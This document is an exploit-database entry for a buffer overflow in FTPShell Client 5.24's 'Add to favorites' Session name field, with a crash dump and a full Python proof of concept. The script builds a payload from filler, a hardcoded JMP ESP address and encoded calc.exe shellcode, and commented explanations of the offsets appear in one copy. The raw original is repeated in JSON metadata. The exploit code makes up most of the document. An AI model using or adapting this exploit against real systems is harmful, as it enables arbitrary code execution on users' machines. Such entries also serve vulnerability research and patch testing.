ID EXPLOITPACK:3C9AFAF9B05B6CDACE7BA7DDE4E87F5C
Type exploitpack
Reporter INSECT.B
Modified 2016-01-04T00:00:00
Description
FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
# Twitter : @INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86
# CVE : N/A
"""
[+] Type : Buffer Overflow
[-] FTPShell Client has a buffer overflow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field,
[-] which is used to add a session to the favorites list.
[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
[-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
[-] 41414141 ?? ???
"""
import struct
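# --- payload layout ---------------------------------------------------------
# Offsets reproduce the original PoC: 460 bytes of filler reach the saved
# return address (EIP = 0x41414141 in the crash dump above), the next 4 bytes
# overwrite it with a JMP ESP gadget, and ESP then points at the shellcode
# that follows.  Everything is built as bytes so the file is written
# byte-for-byte on both Python 2 and Python 3 (a text-mode str write would
# go through newline translation / the locale codec and corrupt the buffer).
junk = b"A" * 460      # filler up to the saved return address
junk2 = b"\x90" * 248  # trailing filler placed AFTER the shellcode; it is not
                       # a landing sled and is never reached unless sc returns

# Return-address overwrite: little-endian 0x73DFD40B, a JMP ESP gadget.
# NOTE(review): this address is specific to the module/OS build the author
# tested on (Windows 7 SP1 x86 per the header); re-locate it for any other
# target, and prefer a gadget from a non-ASLR/non-rebased module if the
# client loads one.
esp = b"\x0B\xD4\xDF\x73"  # JMP ESP

# shellcode
# CMD : calc.exe
# encoder : Alpha-mix encoder
# buffer register : esp
# The first two bytes (0x54 push esp / 0x59 pop ecx) load ESP into the
# decoder's base register, so sc must sit exactly where ESP points after the
# JMP ESP, i.e. immediately after the 4-byte return address.
# NOTE(review): the alphanumeric encoding presumably exists to survive the
# GUI text field; verify the field's bad characters (and any ANSI/Unicode
# conversion on the tested Korean Windows build) before swapping encoders.
sc = (b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
      b"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
      b"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
      b"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
      b"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
      b"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
      b"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
      b"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
      b"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
      b"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
      b"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
      b"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
      b"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
      b"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
      b"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
      b"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
      b"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
      b"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
      b"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
      b"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
      b"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
      b"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
      b"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
      b"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
      b"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
      b"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
      b"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
      b"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
      b"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
      b"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
      b"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
      b"\x73\x55\x75\x50\x41\x41"
      )

# Final buffer pasted into the 'Session name' field.
payload = junk + esp + sc + junk2


def write_payload(path):
    """Write the raw payload to *path* in binary mode.

    Binary mode is required: a text-mode write could newline-translate on
    Windows (Python 2) or re-encode the 0x90 bytes through the locale codec
    (Python 3), corrupting the buffer before it reaches the target.
    """
    with open(path, "wb") as out:
        out.write(payload)


if __name__ == "__main__":
    # Same output location as the original PoC.
    write_payload("C:\\shelll")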
{"lastseen": "2020-04-01T19:04:15", "references": [], "description": "\nFTPShell Client 5.24 - Add to Favorites Buffer Overflow", "edition": 1, "reporter": "INSECT.B", "exploitpack": {"type": "local", "platform": "windows"}, "published": "2016-01-04T00:00:00", "title": "FTPShell Client 5.24 - Add to Favorites Buffer Overflow", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:15", "rev": 2}, "score": {"value": 0.5, "vector": "NONE", "modified": "2020-04-01T19:04:15", "rev": 2}, "vulnersScore": 0.5}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-01-04T00:00:00", "id": "EXPLOITPACK:3C9AFAF9B05B6CDACE7BA7DDE4E87F5C", "href": "", "viewCount": 0, "sourceData": "# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow\n# Google Dork: N/A\n# Date: 2015-01-04\n# Exploit Author: INSECT.B\n#\tTwitter : @INSECT.B\n#\tFacebook : https://www.facebook.com/B.INSECT00\n#\tBlog : http://binsect00.tistory.com\n# Vendor Homepage: www.ftpshell.com\n# Software Link: http://www.ftpshell.com/download.htm\n# Version: 5.24\n# Tested on: Windows7 Ultimate SP1 K x86 \n# CVE : N/A\n\n\"\"\"\n[+] Type : Buffer Overflow\n[-]\t ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field\n[-]\tused to add session to favorites list .\n\n[+]Crash : input 'A' x 1500 to Session name field\n[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)\n[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c\n[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc\n[-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246\n[-] 41414141 ?? 
???\n\"\"\"\n\nimport struct\n\njunk = \"A\"*460\njunk2 = \"\\x90\"*248\n\nesp = \"\\x0B\\xD4\\xDF\\x73\" # JMP ESP\n\n#shellcode\n#CMD : calc.exe\n#encoder : Alpha-mix encoder\n#buffer register : esp \nsc = (\"\\x54\\x59\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" +\n\"\\x49\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\" +\n\"\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\" +\n\"\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\\x4c\\x38\\x68\" +\n\"\\x4b\\x32\\x33\\x30\\x75\\x50\\x63\\x30\\x65\\x30\\x6c\\x49\\x5a\\x45\" +\n\"\\x65\\x61\\x39\\x50\\x35\\x34\\x4c\\x4b\\x46\\x30\\x54\\x70\\x4e\\x6b\" +\n\"\\x63\\x62\\x46\\x6c\\x6e\\x6b\\x43\\x62\\x47\\x64\\x4c\\x4b\\x44\\x32\" +\n\"\\x46\\x48\\x74\\x4f\\x4f\\x47\\x51\\x5a\\x37\\x56\\x35\\x61\\x59\\x6f\" +\n\"\\x6e\\x4c\\x45\\x6c\\x43\\x51\\x53\\x4c\\x43\\x32\\x44\\x6c\\x65\\x70\" +\n\"\\x5a\\x61\\x5a\\x6f\\x74\\x4d\\x37\\x71\\x6a\\x67\\x4a\\x42\\x39\\x62\" +\n\"\\x76\\x32\\x42\\x77\\x6c\\x4b\\x31\\x42\\x36\\x70\\x4e\\x6b\\x33\\x7a\" +\n\"\\x57\\x4c\\x6e\\x6b\\x32\\x6c\\x66\\x71\\x42\\x58\\x78\\x63\\x53\\x78\" +\n\"\\x73\\x31\\x7a\\x71\\x36\\x31\\x4e\\x6b\\x66\\x39\\x51\\x30\\x36\\x61\" +\n\"\\x59\\x43\\x6e\\x6b\\x57\\x39\\x62\\x38\\x58\\x63\\x45\\x6a\\x52\\x69\" +\n\"\\x6c\\x4b\\x44\\x74\\x4e\\x6b\\x55\\x51\\x7a\\x76\\x70\\x31\\x69\\x6f\" +\n\"\\x6c\\x6c\\x6f\\x31\\x48\\x4f\\x36\\x6d\\x65\\x51\\x7a\\x67\\x76\\x58\" +\n\"\\x59\\x70\\x61\\x65\\x48\\x76\\x53\\x33\\x71\\x6d\\x4b\\x48\\x35\\x6b\" +\n\"\\x61\\x6d\\x36\\x44\\x31\\x65\\x4b\\x54\\x30\\x58\\x6e\\x6b\\x66\\x38\" +\n\"\\x76\\x44\\x56\\x61\\x4e\\x33\\x51\\x76\\x6c\\x4b\\x74\\x4c\\x72\\x6b\" +\n\"\\x6e\\x6b\\x71\\x48\\x47\\x6c\\x57\\x71\\x7a\\x73\\x4c\\x4b\\x66\\x64\" +\n\"\\x6e\\x6b\\x36\\x61\\x6e\\x30\\x4d\\x59\\x50\\x44\\x57\\x54\\x66\\x44\" +\n\"\\x63\\x6b\\x71\\x4b\\x61\\x71\\x63\\x69\\x61\\x4a\\x36\\x31\\x39\\x6f\" +\n\"\\x59\\x70\\x61\\x4f\\x61\\x4f\\x52\\x7a\\x4c\\x4b\\x64\\x52\\x5a\\x4b\" 
+\n\"\\x6e\\x6d\\x31\\x4d\\x32\\x4a\\x75\\x51\\x6c\\x4d\\x4b\\x35\\x48\\x32\" +\n\"\\x75\\x50\\x65\\x50\\x67\\x70\\x66\\x30\\x73\\x58\\x65\\x61\\x4c\\x4b\" +\n\"\\x52\\x4f\\x6b\\x37\\x59\\x6f\\x48\\x55\\x4d\\x6b\\x38\\x70\\x78\\x35\" +\n\"\\x59\\x32\\x33\\x66\\x72\\x48\\x79\\x36\\x5a\\x35\\x6d\\x6d\\x4d\\x4d\" +\n\"\\x6b\\x4f\\x58\\x55\\x45\\x6c\\x33\\x36\\x61\\x6c\\x76\\x6a\\x6b\\x30\" +\n\"\\x6b\\x4b\\x4d\\x30\\x54\\x35\\x45\\x55\\x4f\\x4b\\x62\\x67\\x37\\x63\" +\n\"\\x70\\x72\\x70\\x6f\\x70\\x6a\\x45\\x50\\x46\\x33\\x69\\x6f\\x49\\x45\" +\n\"\\x50\\x63\\x65\\x31\\x50\\x6c\\x71\\x73\\x46\\x4e\\x42\\x45\\x70\\x78\" +\n\"\\x73\\x55\\x75\\x50\\x41\\x41\"\n)\n\n\n\npayload = junk + esp + sc + junk2\n\nfile=open(\"C:\\\\shelll\",\"w\")\nfile.write(payload)\nfile.close()", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}
{}